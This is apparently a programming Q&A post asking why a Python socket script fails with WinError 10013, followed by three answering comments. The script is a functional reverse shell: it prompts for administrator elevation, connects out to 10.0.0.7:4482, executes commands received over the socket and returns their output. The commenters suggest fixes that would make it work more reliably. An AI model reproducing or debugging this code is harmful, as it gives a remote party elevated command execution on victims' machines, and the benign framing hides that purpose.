# PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions

Tags: python, sockets

Whenever I try to run my code, it gives me an error:

> PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions

Here's my code:

```py
import os
import socket
import subprocess
import ctypes, sys

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

if is_admin():
    pass
else:
    # Re-run the program with admin rights
    ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
host='10.0.0.7'
port=4482
s=socket.socket()
s.connect((host,port))

while True:
    data=s.recv(1024)
    if data[:2].decode('utf-8')=='cd':
        os.chdir(data[3:].decode('utf-8'))
    if len(data)>0:
        cmd=subprocess.Popen(data.decode('utf-8'),shell=False,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
        output_bytes=cmd.stdout.read()+cmd.stderr.read()
        output_str=str(output_bytes)
        s.send(str.encode(output_str + str(os.getcwd())) +'>')
#Close Connection
s.close()
```

The code should run smoothly without any issues, and connect to the socket server. The script is also checking for administrator permissions in order to run as expected. But still, it is giving an error. I ran out of ideas and tried to research this issue, but couldn't get an answer that fixes the problem.

Comment: Which line of code, exactly, is raising the error?

Comment: Error 10013 often means a firewall is blocking you.  Note that even if you use `runas` to run the app as admin, you still fall through and continue the execution as an unprivileged user.  I suspect you meant to do `sys.exit(0)` after the `runas` call.  And you can always replace `if xxx:` / `pass` / `else:` with the simpler `if not xxx:`.

Comment: May as well decode just once: `data = s.recv(1024).decode("utf-8")`. You wanted to compare three characters here: `if data[:3] == "cd ":`. You want to have an `else` distinguishing between "chdir /some/where" and "run program foo". Up at the top, I wouldn't mind seeing `assert is_admin()` to verify that it worked.